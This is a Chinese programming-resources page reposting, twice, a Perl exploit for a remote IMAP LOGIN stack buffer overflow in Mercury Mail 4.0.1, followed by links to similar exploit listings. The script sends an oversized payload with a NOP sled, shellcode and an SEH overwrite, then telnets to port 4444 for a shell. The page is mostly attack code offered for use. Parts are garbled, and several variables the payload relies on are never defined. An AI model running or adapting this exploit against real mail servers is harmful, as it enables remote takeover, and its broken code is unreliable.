您现在的位置是:网站首页> 编程资料编程资料
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit _Exploit_网络安全_
2023-05-24
440人已围观
简介 Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit _Exploit_网络安全_
#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
相关内容
- Maian Cart 1.1 Insecure Cookie Handling Vulnerability _Exploit_网络安全_
- Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability _Exploit_网络安全_
- Maian Gallery 2.0 Insecure Cookie Handling Vulnerability _Exploit_网络安全_
- Maian Events 2.0 Insecure Cookie Handling Vulnerability _Exploit_网络安全_
- Maian Music 1.0 Insecure Cookie Handling Vulnerability _Exploit_网络安全_
- Maian Greetings 2.1 Insecure Cookie Handling Vulnerability _Exploit_网络安全_
- Joomla Component n-forms 1.01 Blind SQL Injection Exploit _Exploit_网络安全_
- fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php) _Exploit_网络安全_
- fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl) _Exploit_网络安全_
- WebCMS Portal Edition (id) Remote SQL Injection Vulnerability _Exploit_网络安全_
